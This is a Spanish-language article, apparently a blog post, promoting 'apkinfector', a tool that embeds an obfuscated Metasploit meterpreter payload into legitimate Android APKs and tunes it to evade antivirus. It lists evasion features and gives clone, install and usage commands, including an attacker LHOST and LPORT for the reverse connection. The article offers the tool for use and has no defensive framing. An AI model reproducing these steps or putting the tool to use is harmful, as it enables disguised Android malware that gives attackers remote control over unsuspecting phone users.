Herramienta avanzada de evasión antivirus para Android escrita en Python 3 que puede incrustar/vincular el APK de meterpreter a cualquier APK legítimo y puede ofuscar completamente la carga útil de meterpreter con diferentes técnicas.
En este artículo, vamos a presentar una herramienta avanzada que se puede utilizar para infectar aplicaciones de Android (APK) con una carga útil meterpreter de Metasploit.
Características
- Automatizar completamente la creación de cargas útiles (Payload) con MSFvenom
- Crea un archivo handler.rc
- Indetectable
- Ofusca el Meterpreter APK
- Une/incorpora Meterpreter APK con cualquier APK legítimo
- Genera automáticamente una clave que se utiliza en la firma
- Capaz de firmar el APK usando Jarsigner o APKsigner
- Zipalign el APK firmado
- Baraja los permisos del APK de Meterpreter para la evasión de AV
- Cambia el nombre de la carpeta por defecto y los nombres de los archivos que están siendo marcados por AV
Visión general de las herramientas
Requisitos
- Python 3.X
- APKsigner o Jarsigner
- APK Tool [Última]
- ZipAlign
Probado en: Kali. Kali Linux – 2019.4
Instalación y uso
- Navega hasta el directorio /opt (opcional)
cd /opt/- Clona este repositorio
git clone https://github.com/PushpenderIndia/apkinfector.git- Navega a la carpeta cd apkinfector:
cd apkinfector- Instalar las dependencias
apt-get update && apt-get install apktool && apt-get install zipalign && apt-get install apksigner- Ejecuta la herramienta por primera vez
python3 infector.py --help- Ejemplo de uso
python3 infector.py --lhost 192.168.43.70 --lport 4444 --apk-name NEW_APK_NAME --normal-apk /root/Desktop/Path/TO/Legitemate_APK_File.apkArgumentos disponibles
Argumentos opcionales
| Comando Corto | Comando Largo | Descripción |
|---|---|---|
| -h | –help | mostrar este mensaje de ayuda |
Argumentos requeridos
| Comando Corto | Comando Largo | Descripción |
|---|---|---|
| –lhost 192.168.44.33 | Dirección IP del atacante | |
| –lport 4444 | Puerto del atacante | |
| -n NORMAL_APK | –normal-apk NORMAL_APK | Ruta Absoluta del Archivo APK Legítimo |
| –apk-name APKNAME | Nombre del APK (Cualquier cosa que quieras nombrar) |
apkinfector (este enlace se abre en una nueva ventana) por PushpenderIndia (este enlace se abre en una nueva ventana)
Advanced Android AV Evasion Tool Written In Python 3 that can Embed/Bind meterpreter APK to any Legitimate APK
